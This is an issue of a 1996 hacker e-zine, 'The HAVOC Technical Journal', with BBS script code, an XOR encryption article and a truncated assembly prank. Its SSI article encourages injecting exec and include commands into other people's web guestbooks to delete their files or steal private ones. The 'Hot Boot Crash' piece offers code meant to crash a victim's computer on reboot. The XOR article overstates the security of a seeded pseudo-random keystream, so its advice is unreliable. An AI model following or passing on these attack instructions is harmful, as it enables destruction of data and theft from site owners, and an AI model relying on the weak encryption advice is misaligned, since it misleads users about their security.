������������������������������������������������������������������͸ �The HAVOC Technical Journal �� �������������������������������������������������������������������ٱ �������������������������������������������������������������������� Vol. 1 | No.6 | December 15th, 1996 | A HAVOC Bell Systems Publication "To protect and serve" Happy Athiest Day! (Jan. 5th) _____________________________________________________________________________ Inside this issue: Whats new this issue.............................. Editorial.........................................Scud-O The HellNet[tm] C/Source Code.....................Scud-O SSI weaknessess...................................Scud-O system()..........................................Scud-O XOR Encryption....................................Psycho Hot Boot Crash....................................|\|\cFill Transatlantic Telephone Cable #8..................Keystroke For your reading pleasure......................... RTFM: The lamer Journal........................... ROLL CALL & more!................................. Next Month........................................ Send all mail to: thtj@juno.com If you want to write an article for THTJ email: FoxMuldet@worldnet.att.net This months music supplied by: Cake, Beck, Sebado, Blood Hound Gang, Tool, Pink Floyd and WHFS 99.1 ! Good Techno music from: sm:)e communications What's new in this issue: Not much, but FINALLY Psycho (the world's biggest lamer!) has written an article! So now, for the first time, all the HBS members that aren't MIA have written for THTJ! ----------------------------------------------------------- How to contact us: Check Out Our Web Site: www.geocities.com/SiliconValley/8805/ Scud-O's e-mail : FoxMulder@worldnet.att.net Psycho's e-mail : psycho@smart.net |\|\cFill's email : down -- server crashed Keystroke's email : prenzo@soho.ios.com our Mag e-mail is : thtj@juno.com HELLCORE's e-mail : hellcore@juno.com --------------------------------------------------------------- HBS members now (should) have web pages up on our site. go to: www.geocities.com/SiliconValley/8805/members.html The HAVOC Technical Journal Site of the MONTH: +-----------------------------------------------------------+ | theLURK3R's WebSite at: | | http://home.earthlink.net/~rseal/ | +-----------------------------------------------------------+ Editorial: Well this issue has turned out pretty well. The past month has been pretty good as well. The web site has been MAJORLY updated, we now are adding HBS member pages, we have a links page, and AT&T finally let their users use Netscape 2.02 (except ATT changed it and added a pain in the arse bug! I get all this fucking gibberish and have to reload like crazy! its annoying to see gibberish and the page you we just at... damn AT&T!) Anyway... The 403 Forbidden club is dead. It was a gay name. But in spirit, its not dead. HBS Chat is what we are renaming it, and it is going to be cool. The main chat area will be split up into 3 frames, one for the chat, one for users, one for your input. It's just like how mIRC looks. hopefully we can have it up by the new year. It's time delayed chat, but it will reload faster than other web chats. Psycho is the main man on this project, since he knows a little java (and the fact that he would rather use this power for good and not evil) he is writting it. I know a little java and I might help out a little. So every one, give Psycho a round of applause! We would have used CGI.. but geocities sucks and says no. (but me should be moving to either luthor's site or L0pht soon, and they both allow CGI!) Anyway that is all for now... now I must get on with issue 6... ---------------------------------------------- / ---/ --/ / / | /------/ / / /--- /-----/------/-----/ / / / /----------/ /--------/ -of HAVOC Bell Systems- FoxMulder@worldnet.att.net Join the Athiest Coalition today. To protect our rights! [tm] "A Scud - a theater ballistic missile - is one of the hardest targets. They're big stainless steel tanks." - Michael F. Weisbach, Boeing's airborne laser project manager ============================================================================= The HellNet[tm] C/Script Source Code: by Scud-O I first started on the HellNet[tm] source code the day I got my new 28.8 modem. The US Robotics one I bought came with Quick Link Message Center. It had a host mode that I started to play with. I first only modified the intro text files, but then I wanted to add more. File descriptions would be nice, so would chat. so I went to the Quick Link directory and opened up HOSTMODE.SRP The first thing I noticed was that the script language looked a lot like C code. Hmmm.. I thought.. after adding a couple of features that mostly just displayed text files I started on the chat. I added a while loop and quess what - it worked! so this IS C code. cool. So anyway here it is, the HellNet[tm] source code. I havent worked on it in about 3-4 months so it is kind of weak. I am now more interested in starting an ISP or other internet stuff.( hell.net sound kind of cool don't you think so? ) Why is it called HellNet[tm]? Because I felt like it. AT&T has Worldnet, and since HBS is the opposite of AT&T, we had so call it HellNet. The [tm] comes in because Worldnet is a SM (slogan mark) and HellNet[tm] looked cool. Text files you need to create: ABOUT.TXT - About your BBS BYE.TXT - Log off screen CALLERS.TXT - LEAVE EMPTY! caller info bbs will add FILEZ.TXT - File Descriptions HOSTHELP.TXT - HELP - you can leave blank, or fill in HOSTMODE.TXT - The main menu MSG.TXT - Bulletins WAREZ.TXT - the Warezhouse: buy/sell/trade area maybe? HOSTMODE.SRP ------------------------------------- int STACKSIZE = 45; /* HAVOC Bell Systems HellNet[tm] Host Mode Script Version 0 */ /* Copyright HAVOC Bell Systems (c) 1996 ALL FIGHT F**KED! */ int BaudRate; char FALSE = 0; char TRUE = 1; char CANCEL = -1; int MAX_FILE_LEN = 144; int HOST_TIMOUT; char DefaultProtocol; char CurrentDir[144]; char StartupDir[144]; char TempDir[144]; char UserName[82]; char userString[82]; char host_timeout = FALSE; char host_continue; char security_level; char last_prompt; char ASCIITransComplete[] = "\r\nASCII transfer completed.\r\n"; char ASCIITransCanceled[] = "\r\nASCII transfer completed.\r\n"; char xTransComplete[] = "\r\nXmodem transfer completed.\r\n"; char xTransCanceled[] = "\r\nXmodem transfer canceled.\r\n"; char yTransComplete[] = "\r\nYmodem transfer completed.\r\n"; char yTransCanceled[] = "\r\nYmodem transfer canceled.\r\n"; char kTransComplete[] = "\r\nKermit transfer completed.\r\n"; char kTransCanceled[] = "\r\nKermit transfer canceled.\r\n"; char zTransComplete[] = "\r\nZmodem transfer completed.\r\n"; char zTransCanceled[] = "\r\nZmodem transfer canceled.\r\n"; char xyCancelPrompt[] = "\r\nPress Ctrl-X several times to cancel.\r\n"; char thatSelection[] = "\r\nThe option you selected is not available to you.\r\n"; char accessDenied[] = "\r\nAccess denied.\r\n"; char tooLong[] = "\r\n\r\nYou took too long to respond.\r\n\r\nGoodbye!\r\n"; char invalid[] = "\r\nInvalid selection.\r\n"; char pleaseWaitProcessing[] = "\r\nPlease wait. Your request is being processed...\r\n"; char *days[] = {"Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"}; HostOut(char *str) { Out(str); Echo(str); } ListProtocols() { HostOut("\r\nChoose a file transfer protocol...\r\n"); HostOut("<1> ASCII <5> Ymodem\r\n"); HostOut("<2> Xmodem <6> Ymodem-G\r\n"); HostOut("<3> Xmodem CRC <7> Kermit/SuperKermit\r\n"); HostOut("<4> Xmodem 1K <8> Zmodem\r\n"); HostOut(" cancels transfer\r\n"); } SelectProtocol() { int rv; ListProtocols(); DefaultProtocol = 0; PrintHostPrompt(3); rv = GetUserInput(userString, TRUE, HOST_TIMOUT); if (rv) { if ((userString[0] >= 49) && (userString[0] <= 56) && (!userString[1])) DefaultProtocol = userString[0] - 48; else rv = CANCEL; } else host_timeout = TRUE; return(rv); } GetFileName() { int rv; PrintHostPrompt(4); rv = GetUserInput(userString, TRUE, HOST_TIMOUT); if (rv == CANCEL) { return(CANCEL); } else if (rv == TRUE) { if (userString[0]) { if ((Exists(userString)) == -1) { return(-2); } else { return(TRUE); } } } else host_timeout = TRUE; return(FALSE); } PutFileName() { int rv; PrintHostPrompt(4); rv = GetUserInput(userString, TRUE, HOST_TIMOUT); if (rv == CANCEL) { return(CANCEL); } else if (rv == TRUE) { if (userString[0]) { if ((Exists(userString)) == -1) { return(TRUE); } else { return(FALSE); } } } else host_timeout = TRUE; return(FALSE); } GetMultipleFiles(char *fileName) { char ret = TRUE; if (fileName[0]) AddFile(fileName); HostOut("\r\nSpecify multiple files, blank filename terminates list.\r\n"); while ((ret == TRUE) && !host_timeout) { while ((ret = GetFileName()) == -2) HostOut("\r\nFile does not exist.\r\n"); StrCpy(userString, fileName); if (fileName[0]) AddFile(fileName); } } DownloadFiles() { int rv; char fileName[MAX_FILE_LEN]; ClearList(); HostOut("\r\nFile Download"); if ((GetFileName() == TRUE) && !host_timeout) { StrCpy(userString, fileName); rv = SelectProtocol(); if (rv == CANCEL) return(CANCEL); else if (rv == FALSE) return(host_timeout); if (DefaultProtocol == 1) { PrintHostPrompt(5); if (GetUserInput(userString, TRUE, HOST_TIMOUT)) { if (Upload(1, fileName)) HostOut(ASCIITransComplete); else HostOut(ASCIITransCanceled); } else { host_timeout = TRUE; } } else if ((DefaultProtocol == 2) || (DefaultProtocol == 3)) { HostOut("\r\nBegin your Xmodem receive now."); HostOut(xyCancelPrompt); Wait(2); if (Upload(3, fileName)) HostOut(xTransComplete); else HostOut(xTransCanceled); } else if (DefaultProtocol == 4) { HostOut("\r\nBegin your Xmodem 1K receive now."); HostOut(xyCancelPrompt); if (Upload(4, fileName)) HostOut(xTransComplete); else HostOut(xTransCanceled); } else if ((DefaultProtocol == 5) || (DefaultProtocol == 6)) { GetMultipleFiles(fileName); if (!host_timeout) { if (DefaultProtocol == 5) HostOut("\r\nBegin your Ymodem receive now."); else HostOut("\r\nBegin your Ymodem-G receive now."); HostOut(xyCancelPrompt); Wait(2); if (Upload(5)) HostOut(yTransComplete); else HostOut(yTransCanceled); } } else if (DefaultProtocol == 7) { GetMultipleFiles(fileName); if (!host_timeout) { HostOut("\r\nBegin your Kermit/SuperKermit receive now."); HostOut(xyCancelPrompt); if (Upload(2)) HostOut(kTransComplete); else HostOut(kTransCanceled); } } else if (DefaultProtocol == 8) { GetMultipleFiles(fileName); if (!host_timeout) { HostOut("\r\nBegin your Zmodem receive now."); HostOut(xyCancelPrompt); if (Upload(7)) HostOut(zTransComplete); else HostOut(zTransCanceled); } } } else HostOut("\r\nFile does not exist.\r\n"); } ListFiles() { PrintHostPrompt(6); if (GetUserInput(userString, TRUE, HOST_TIMOUT)) { if (userString[1] == ':') { HostOut("\r\nCannot list files across drives.\r\n"); return; } if (!userString[0]) StrCpy("*.*", userString); DisplayFiles(userString, security_level); } else host_timeout = TRUE; } UploadFiles() { int file, i = 0, lines = 0, rv; char ch, buffer[80]; Sprintf(buffer, "\r\nThere are %i000 bytes of available disk space on drive %c:\r\n", KBytesFree(CurrentDir[0]), CurrentDir[0]); HostOut(buffer); rv = SelectProtocol(); if (rv == CANCEL) return(CANCEL); else if (rv == FALSE) return(host_timeout); if (DefaultProtocol == 1) { if (PutFileName() == TRUE) { HostOut("\r\nStart your ASCII send now.\r\nPress Ctrl-Z when complete.\r\n"); rv = Download(1, userString); if (rv) HostOut(ASCIITransComplete); else HostOut(ASCIITransCanceled); } else { HostOut("\r\nFile already exists.\r\n"); return(CANCEL); } } else if (DefaultProtocol == 2) { if (PutFileName() == TRUE) { HostOut("\r\nStart your Xmodem send now."); HostOut(xyCancelPrompt); Wait(2); rv = Download(3, userString); if (rv) HostOut(xTransComplete); else HostOut(xTransCanceled); } else { HostOut("\r\nFile already exists.\r\n"); return(CANCEL); } } else if (DefaultProtocol == 3) { if (PutFileName() == TRUE) { HostOut("\r\nStart your Xmodem CRC send now."); HostOut(xyCancelPrompt); Wait(2); rv = Download(4, userString); if (rv) HostOut(xTransComplete); else HostOut(xTransCanceled); } else { HostOut("\r\nFile already exists.\r\n"); return(CANCEL); } } else if (DefaultProtocol == 4) { if (PutFileName() == TRUE) { HostOut("\r\nStart your Xmodem 1K send now."); HostOut(xyCancelPrompt); Wait(2); rv = Download(5, userString); if (rv) HostOut(xTransComplete); else HostOut(xTransCanceled); } else { HostOut("\r\nFile already exists.\r\n"); return(CANCEL); } } else if (DefaultProtocol == 5) { HostOut("\r\nStart your Ymodem send now."); HostOut(xyCancelPrompt); Wait(2); rv = Download(6); if (rv) HostOut(yTransComplete); else HostOut(yTransCanceled); } else if (DefaultProtocol == 6) { HostOut("\r\nStart your Ymodem-G send now."); HostOut(xyCancelPrompt); Wait(2); rv = Download(7); if (rv) HostOut(yTransComplete); else HostOut(yTransCanceled); } else if (DefaultProtocol == 7) { HostOut("\r\nStart your Kermit/SuperKermit send now.\r\n"); rv = Download(2); if (rv) HostOut(kTransComplete); else HostOut(kTransCanceled); } else if (DefaultProtocol == 8) { HostOut("\r\nStart your Zmodem send now.\r\n"); rv = Download(8); } return(rv); } ChangeDirectory() { char directory[85], oldDir[85]; int i = 0, j, file; HostOut("\r\nCurrent path is: "); Echo(CurrentDir); OutBuffer(CurrentDir, StrLen(CurrentDir)); HostOut("\r\n Change path to: "); if (GetUserInput(userString, TRUE, HOST_TIMOUT)) { if (userString[0]) { if (SetDirectory(userString)) StrCpy(GetDirectory(), CurrentDir); else HostOut("\r\nCannot change to specified path.\r\n"); } return(TRUE); } else { host_timeout = TRUE; return(FALSE); } } ChangeDrive() { int i = 0, j, file; char junk[3]; HostOut("\r\nCurrent drive is: "); Copy(CurrentDir, junk, 2); junk[2] = 0; HostOut(junk); HostOut("\r\n Change drive to: "); if (GetUserInput(userString, TRUE, HOST_TIMOUT)) { if (userString[0]) { if (SetDrive(userString)) StrCpy(GetDirectory(), CurrentDir); else HostOut("\r\nCannot change to specified drive.\r\n"); } return(TRUE); } else { host_timeout = TRUE; return(FALSE); } } PrintHostPrompt(int prompt) { if (prompt) last_prompt = prompt; if (last_prompt == 1) { HostOut("\r\nbout illboards hange Drive ownload arlier Callers ilez oodbye elp ist ove elist alk pload arezhouse\r\n"); HostOut("Enter selection : "); } else if (last_prompt == 2) HostOut("\r\nEnter Password: "); else if (last_prompt == 3) HostOut("\r\nEnter Selection 1-8 or to cancel: "); else if (last_prompt == 4) HostOut("\r\nFilename: "); else if (last_prompt == 5) HostOut("\r\nPress return to begin ASCII receive, to cancel:\r\n"); else if (last_prompt == 6) HostOut("\r\nEnter file search parameter (e.g. *.*). to search for all.\r\n->"); else if (last_prompt == 7) HostOut("\r\nEnter Name: "); else if (last_prompt == 8) HostOut("\r\nAre you sure? : "); else if (last_prompt == 9) HostOut("\r\nEnter Sysop Password: "); } LogCall(char *UserName) { int hFile; char szLogLine[80]; int year, month, day, dayofweek, hour, minute, second, hsecond; Time(&year, &month, &day, &dayofweek, &hour, &minute, &second, &hsecond); StrCpy(HomePath(), TempDir); StrCat(TempDir, "CALLERS.TXT"); hFile = Open(TempDir, 1); Seek(hFile, 0, 2); Sprintf(szLogLine, "%-25s %s %i:%i\r\n", UserName, days[dayofweek], hour, minute); Write(hFile, szLogLine, StrLen(szLogLine)); Close(hFile); } HostMainLoop() { char host_online = TRUE, rightpassword = FALSE; int start_time, i; int year, month, day, dayofweek, hour, minute, second, hsecond; start_time = Time(&year, &month, &day, &dayofweek, &hour, &minute, &second, &hsecond); while ((CarrierDetect()) && (host_online)) { PrintHostPrompt(1); if ((i = GetUserInput(userString, TRUE, HOST_TIMOUT)) == TRUE) { if ((userString[0] == 'd') || (userString[0] == 'D')) { if (AllowDownloads()) DownloadFiles(); else HostOut(thatSelection); } else if ((userString[0] == 'g') || (userString[0] == 'G')) { PrintHostPrompt(8); if (GetUserInput(userString, TRUE, HOST_TIMOUT)) { if ((userString[0] == 'y') || (userString[0] == 'Y')) { StrCpy(HomePath(), TempDir); StrCat(TempDir, "BYE.TXT"); if (!OutFile(TempDir)) HostOut("\r\nGoodbye lamer!\r\n"); host_online = FALSE; } } else host_timeout = TRUE; } else if ((userString[0] == 'h') || (userString[0] == 'H') || (userString[0] == '?')) { StrCpy(HomePath(), TempDir); StrCat(TempDir, "HOSTHELP.TXT"); if (!OutFile(TempDir)) HostOut("\r\nNo help available.\r\n"); } else if ((userString[0] == 'l') || (userString[0] == 'L')) { ListFiles(); } else if ((userString[0] == 'u') || (userString[0] == 'U')) { if (AllowUploads()) UploadFiles(); else HostOut(thatSelection); } else if ((userString[0] == 'm') || (userString[0] == 'M')) { if (security_level > 1) ChangeDirectory(); else HostOut(thatSelection); } else if ((userString[0] == 'c') || (userString[0] == 'C')) { if (security_level > 1) ChangeDrive(); else HostOut(thatSelection); } /* Added by HAVOC 7/30/96 */ /* Billboard program i.e messages + mail! */ else if ((userString[0] == 'b') || (userString[0] == 'B')) { StrCpy(HomePath(), TempDir); StrCat(TempDir, "MSG.TXT"); if (!OutFile(TempDir)) HostOut("\r\nNo MSG available.\r\n"); } /* Added by HAVOC 7/30/96 */ /* chat between op + usr */ /* continued work on it 9/14/96 */ else if ((userString[0] == 't') || (userString[0] == 'T')) { HostOut("\r\nNOTE: press the tilde key '~' to exit chat!\r\n"); for(;;) /* while(userString[0]!= '~') */ { userString[0]=GetUserInput(); if userString[0] == '~' { break; } else { continue; } } } /* Added by HAVOC 8/4/96 */ else if ((userString[0] == 'a') || (userString[0] == 'A')) { StrCpy(HomePath(), TempDir); StrCat(TempDir, "ABOUT.TXT"); if (!OutFile(TempDir)) HostOut("\r\nABOUT is not available now.\r\n"); } /* Added by HAVOC 8/4/96 */ else if ((userString[0] == 'r') || (userString[0] == 'R')) { StrCpy(HomePath(), TempDir); StrCat(TempDir, "HOSTMODE.TXT"); if (!OutFile(TempDir)) HostOut("\r\nError! Menu is not available now.\r\n"); } /* Added by HAVOC 8/13/96 */ else if ((userString[0] == 'f') || (userString[0] == 'F')) { StrCpy(HomePath(), TempDir); StrCat(TempDir, "FILEZ.TXT"); if (!OutFile(TempDir)) HostOut("\r\nError! Filez are offline!\r\n"); } /* Added by HAVOC 8/13/96 */ else if ((userString[0] == 'w') || (userString[0] == 'W')) { StrCpy(HomePath(), TempDir); StrCat(TempDir, "WAREZ.TXT"); if (!OutFile(TempDir)) HostOut("\r\nError! Da Warezhouse is empty!\r\n"); } /* Added by HAVOC 9/14/96 */ else if ((userString[0] == 'e') || (userString[0] == 'E')) { StrCpy(HomePath(), TempDir); StrCat(TempDir, "CALLERS.TXT"); if (!OutFile(TempDir)) HostOut("\r\nHey, we just cleaned the caller file, your caller no. 1 !\r\n"); } else HostOut(invalid); } else if (i == 0) host_timeout = TRUE; if (host_timeout) { HostOut(tooLong); break; } } } main() { char ch, connect; int i; int nKey, FaxMgr; host_continue = TRUE; connect = FALSE; HOST_TIMOUT = (HostTimeout()*60); FaxMgr = CalledFromFaxMgr(); if (!FaxMgr) { if (CarrierDetect()) { Echo("\r\nWould you like to hangup the line? : "); if (!GetUserInput(userString, TRUE, HOST_TIMOUT)) { HostOut(tooLong); return(); } if ((userString[0] == 'Y') || (userString[0] == 'y')) { Wait(2); Hangup(); } else if ((userString[0] == 'N') || (userString[0] == 'n')) { connect = TRUE; } } if (!connect) { if (HostSpeed()) Baud(HostSpeed()); Parity('N'); Stop("1"); Data(8); Out(HostInit()); Out("\r"); WaitFor("OK\r\n", 3); } } StrCpy(GetDirectory(), StartupDir); while (host_continue) { SetDrive(HostPath()); SetDirectory(HostPath()); StrCpy(GetDirectory(), CurrentDir); if (!FaxMgr) { if (!connect) { Echo("\r\nWaiting for call...\r\n"); Echo("HAVOC Bell Systems HellNet[tm] v.0\r\n"); Echo("Press to cancel or 'L' to logon locally: "); } } else FaxMgr = FALSE; while ((!connect) && (host_continue)) { nKey = GetKeyStroke(); if (nKey == -1) { Echo("\r\nHost mode canceled by operator\r\n"); host_continue = FALSE; break; } if ((nKey == 'l') || (nKey == 'L')) { connect = TRUE; SetLocalHost(TRUE); Echo("\r\nEntering host mode locally.\r\n"); } BaudRate = CallDetected(); if (BaudRate == -1) { Echo("\r\nWaiting for call...\r\n"); Echo("HAVOC Bell Systems HellNet[tm] V.0\r\n"); Echo("Press to cancel or 'L' to logon locally: "); } else if (BaudRate) { Beep(); LogonDelay(); connect = TRUE; } } if (host_continue && connect) { PrintHostPrompt(7); if (!GetUserInput(UserName, TRUE, HOST_TIMOUT)) { HostOut(tooLong); connect = FALSE; } else { LogCall(UserName); } } if (host_continue && UsePassword() && connect) { security_level = 0; HostOut("\r\n"); for (i = 0; i < 4; i++) { PrintHostPrompt(2); if (GetUserInput(userString, FALSE, HOST_TIMOUT)) { if (UseMovePassword()) { if (!StrnCmpI(userString, Password(), StrLen(Password()))) { security_level = 2; break; } } else { if (!StrnCmpI(userString, Password(), StrLen(Password()))) { security_level = 1; break; } } } else { HostOut(tooLong); connect = FALSE; break; } HostOut("\r\nInvalid password, please try again.\r\n"); } } else { if (UseMovePassword()) security_level = 2; else security_level = 1; } if (host_continue && connect) { if (security_level) { StrCpy(HomePath(), TempDir); StrCat(TempDir, "HOSTMODE.TXT"); OutFile(TempDir); userString[0] = 0; HostMainLoop(); } else HostOut(accessDenied); } SetLocalHost(FALSE); if (CarrierDetect()) { Wait(2); Hangup(); } connect = FALSE; host_timeout = FALSE; } SetDrive(StartupDir); SetDirectory(StartupDir); } END OF HOSTMODE.SRP ------------------- Now all I need to do is create all the COMM port source, the download protocals and the HostOut and other stuff.. and then it will be a stand alone BBS.. anyone want to help me out? NOTE: if you don't have QuickLink e-mail me.. I might send it to you, but i'll tell you where to get it, since we should be getting an FTP site up in a little bit... The full program is only about 2 megs uncompressed... it is probably only like 800k or so compressed. ============================================================================= SSI weaknesses by Scud-O Server Side Includes (SSI) is a powerful feature of Web servers to use only when a document has only a little bit of dynamic data. Using a counter on a page that otherwise doesn't change is an example. However as great as SSI sounds, it also has some serious security weaknesses. Since SSI can be used to execute programs, poorly designed pages can give out tons of info. However not every server can use SSI, and many turn off the feature. The two most popular servers, NCSA and Netscape can use SSI, but the CERN server can not. However their is a CGI out called fakessi.pl that you can use to emulate SSI with. You can find fakessi.pl at: sw.cse.bris.ac.uk/WebTools/fakessi.html . With SSI the main security weaknessed lie in executing CGI's or other programs. You can execute other (insecure) CGI's (like the one in Issue 4) by doing this: Very easy! just change the text between the quotes to run whatever you want. To execute programs: Both of these would return the results of a finger. A little bit o fun: try this: and watch those files just disappear! Okay you are saying.. well I can do this on MY page, but what about OTHER people's pages? Well, one example is the standard guestbooks around. Most of them either allow you to enter HTML commands, or they are stupid and process your comments into HTML. If that server has SSI and you use the code above, their files will be deleted! Some guestbooks strip off SSI, but many do not. I am not sure abouit Lpage, but I suspect that it will not work. However in many guestbook CGI's people write, they will work. Hopefully the web page owner will not see the guestbook and be culeless to why his files are missing! Then if he doesn't update his guestbook, every time some one views it, HIS FILES WILL BE DELETED AGAIN!! Oh well, have fun! Another attack? Say there is a REALLY juicy file some one has on their box that you want. Another feature of SSI was ment to include files in an HTML document can help you. Made to add boilerplates (information you want to repeat in many of you web documents) you can use the tag: This would include the file bottom with what ever is in the file in the web page. (This is great for uniformity, and I indend to use it as soon as I move to luthor's place or L0pht and have CGI access!) Anyway, if in the guestbook for example, you type in: (say this file has some good sniffer info or something..) You should, theoretically have the file outputed to the guest book, and from thies either cut and paste or save the html file and you have the file! ============================================================================= system() - while trying to find a C function so that I can use DOS commands on my school's network I found system(). At first I thought it was a non-ANSI function, but to my surprise, once I looked in a few books and saw that it was included in the stdlib.h header so "hey, great!" . system() is VERY simple to use, but you must be careful with memory. Since the system() runs from the program and the program is run from the OS, it doesn't have free run of the memory. Or at least in DOS, UNIX might be different but I haven't been able to test that yet. So basically if you have enough free RAM, the OS command processor will load, otherwise you will get a nasty error message. the basic format is: system(command); for example in DOS to print out the directory listing you can use either: system("dir"); -OR- char *command = "dir"; system(command); Here is an example of system() : /* system() demonstration by Scud-O of HBS */ /* For The HAVOC Technical Journal Issue 6 */ #include #include main() { char input[40]; /* a buffer for input */ while(1) { /* First get the command */ puts("\nInput your command or hit ENTER to exit"); gets(input); /* exit if line is blank */ if (input[0] == "\0") exit(0); /* otherwise execute command */ system(input); } } Now isn't that simple? If you want to run multiple command, well just use the code above, or do a simple system("command.com") if you are using DOS. Please note: if you are working on a program that is to be multiplatform, don't use system() or if you do, be careful. If you use ANY special OS commands you will have code that is much less portable. Well, that's all folks! ============================================================================= XOR data encryption with an infinite length key by Psycho With the increased awareness of the necessity for privacy of electronic information, there is a need for simple, efficient methods of data encryption. One of the most common methods, for some time now, has been the use of the exclusive-OR (XOR) operator on files, with some small repeating bytestream known as the key. When the resultant file is XORed with the key again, it reverts back to its original state. There are many existing examples of programs that use the XOR method to encrypt files with a key word or phrase. For many, this level of security is more than ample; however, when the length of the encryption key is less than that of the file to be encrypted, there exists the possibility that the repeated key can be deduced, and the file decrypted. Because the key is repeated many times throughout the encryption process, it may be possible to crack the code within a reasonable amount of time, and thus XOR encryption with small keys is not used in high security situations. However, if the key length is sufficiently great, to the point where it is the equal of the data being encrypted, then XOR encryption remains uncrackable, and is thus an easily implemented encryption method. The only problem with using keys as large as the file or datastream you need to encrypt is that both the key must be transferred through a secure medium, which might be either costly or unworkable. If you want to encrypt a four hundred megabyte database, you'll need to carry around a decoder CD-ROM with an equally large key! Obtaining a reliable key of such a size, which cannot be determined by other sources, may prove difficult, and is certainly not efficient. If you deal with large files, then finding and transmitting an extremely long key may be costly and time-consuming (particularly if the key is changed regularly for security purposes). There is, however, a solution! Anyone who has ever generated random numbers upon a computer, quickly realises that the numbers are not truly random. They must be "seeded" with particular values, which give a particular sequence of numbers. We can use this inherent deficiency within random number generators to construct (on-the-fly) an infinitely large key for the purposes of encryption, by seeding it with a particular number which users can specify. Rather than storing the key, we only need pass on the seed value, rather than a huge code-key. Provided the same random number generator is used (usually programming language specific and platform specific) we can have an infinitely large key that gives us increased protection. Security Warning : While this method gives greater security that a small, self-repeating XOR encryption key, it does not guarantee absolute protection. The method used to generate a key exploits a weakness in the random number generators of computing languages - namely that they are pseudo-random number generators. Since they are not truely random (and require a seed), we can replicate the same sequence of numbers time and time again. The problem with a pseudo-random number generator is that there may be some underlying pattern to the numbers it generates. Unless your random number generator avoids repetition, there exists the potential for repetition on extremely large files. General Theory For those who are unfamiliar with the XOR operator, it is covered in most discrete maths / computer science textbook. For the purposes of encryption, it has several desirable properties. Firstly, its extremely simple to use and understand (unlike more advanced methods such as say, the RSA encryption algorithm used in public key cryptography). We have a series of characters known as a "key" which we use to encrypt a file or datastream. Then, we can at a later date use the same key, and the same programming code, with the XOR operator on the encrypted datastream. Our original data is restored, simply by using the XOR function with the key again.

The syntax for XOR encryption, under most programming languages, is like this : encrypted_byte = originalbyte XOR keyvalue (where keyvalue is a byte taken from a repeating sequence of characters which are used both to encrypt and decrypt) Likewise, the syntax for XOR decryption, under most programming languages, is like this : original_byte = encrypted_byte XOR keyvalue (where keyvalue is a byte taken from a repeating sequence of characters which are used both to encrypt and decrypt) For those interested in the more theoretical details, the exclusive-OR operator is evaluated by examining individual bits, and comparing them to the result in the following truth table. +--------------------+ | A B | eXculsive-OR | +-----+--------------+ | 0 0 | 0 | +-----+--------------+ | 0 1 | 1 | +-----+--------------+ | 1 0 | 1 | +-----+--------------+ | 1 1 | 0 | +-----+--------------+ As you can see, the XOR operator will return true if, and only if, the operands are either true, or false, but not both. If A and B are false, then XOR returns false, but if they are different, XOR returns true. Now, to examine and understand why XOR encryption is so simple to use, take any value for A (either 0 or 1) and apply the XOR function to a key-bit (B) of 0. Do so again, and you will see that you arrive at your original bit (A). Likewise with a key value of 0, a second XOR restores the original bit. This is a handy feature, as your program need not have separate encryption and decryption routines. Simply executing the central algorithm once, then again can both encrypt and decrypt. Infinite length keys Our infinite length keys are generated simply through a random number generator which is seeded by a user-specified value. Under most languages, the number generated from one execution of an application will be the same when the application is next executed, unless the generator is seeded; usually by the system timer. But if we seed the generator with a known value - which will generate our encryption key - at a later date that same key can be reproduced for decryption. Example source code The following Turbo Pascal listing gives you a working example of the infinite length key XOR system. Note that random number generators will most likely be platform and language specific, so that a Turbo Pascal compiled system probably won't work with a Visual Basic system, and vice versa. This brings an added benefit, for to break the code, you would not only have to cycle through every single possible seed value, you would also need to know the specific language and version to even attempt to crack the code. Listing one - infinite length XOR encryption example Program InfiniteXORKey; { An example encryption system that selectively seeds a random number generator to choose a particular sequence of random numbers, which are then used to encrypt or decrypt a file. Syntax Infinkey INPUTFILE OUTPUTFILE RANDOMSEED where randomseed is any long integer } uses crt, dos; var Input, Output : file; Numread, NumWritten : word; Buffer : array[1..4096] of char; seed : longint; i : integer; VerifyFile : SearchRec; InputFile, FileName : string; begin { Verify paramaters } if ParamCount <> 3 then begin Writeln ('Invalid number of paramaters'); Halt(1); end; { Verify original file's existance } FindFirst (Paramstr(1), AnyFile, VerifyFile); InputFile := paramstr(1); { Convert file name to uppercase } For i := 1 to length(ParamStr(1)) do FileName := Filename + UpCase(InputFile[i]); If VerifyFile.Name <> FileName then begin Writeln ('Input file not found'); Halt(2); end; Assign (Input, Paramstr(1)); { Open file for input } Reset (Input , 1 ) ; { Record size = 1 } Assign (Output, ParamStr(2)); { Open file for output } Rewrite (Output, 1 ) ; { Record size = 1 } Writeln ('Encrypting ', FileSize(Input), ' bytes....'); { Get information, then encrypt } { Seed our generator to give an infininte key } Val ( Paramstr(3), seed, i); RandSeed := ( seed ); repeat BlockRead (Input, Buffer, SizeOf(Buffer), NumRead); for i :=1 to numread do begin Buffer[i] := chr(ord(buffer[i]) XOR Random(256)); end; BlockWrite ( Output, Buffer, NumRead, NumWritten); until (numread = 0 ) or (numwritten <> numread); Close( Input ); Close( Output ); end. Conclusion While XOR encryption may have been, in the past, viewed as easily crackable, with the principle of seeding a key of the length of the original data, you can incorporate easy encryption into your own software. While it still has its limitations, in that the random number generator used in one language will not give you the same set of values in another language, if you did need to make code that was easily portable to other platforms, you could design your very own random number generator. This would eliminate any of the above mentioned limitations. ============================================================================= Hot Boot Crash by |\|\cFill |\|\cFill e-mailed this to me, and basically what it does is when the user (err, victim) Reboots, well their computer will crash.. have fun! hmm... aparrently South American keyboards beboot on ALT+CTRL+BACKSPACE ... ; ; NAME......: HOTBOOT.ASM ; FUNCTION..: Reboot when ALT+CTRL+BACKSPACE ; COMPILER..: Turbo Assembler 2.0 or sup. ; DATE......: 10/12/1996 ; AUTHOR....: |\|\cFiLL - TeEnAgErS AsSoCiAtEs ; ; TnG Staff: ; - LuCiFeR ; - SoNiC ; - FlaGG ; - |\|\cFiLL ; - AmAzInG BEL EQU 7 CR EQU 13 LF EQU 10 LAST_VECT EQU 80h JMP_FAR EQU 0EAh SHIFT_STATUS EQU 17h CRT_ADDR EQU 63h ALT_CTRL_MASK EQU 0Ch ; MASK FOR ALT+CTRL BKS_SCAN_CODE EQU 0Eh ; BACKSPACE CSEG SEGMENT PARA PUBLIC 'CODE' ASSUME CS:CSEG, DS:CSEG, ES:CSEG, SS:CSEG ORG 100h START: JMP MAIN ; EXECUTE THE SOFT ORG 100h ;******************************************************************************* ; RESIDENT VARIABLES OF SOFT ;******************************************************************************* VEC_TAB DD LAST_VECT 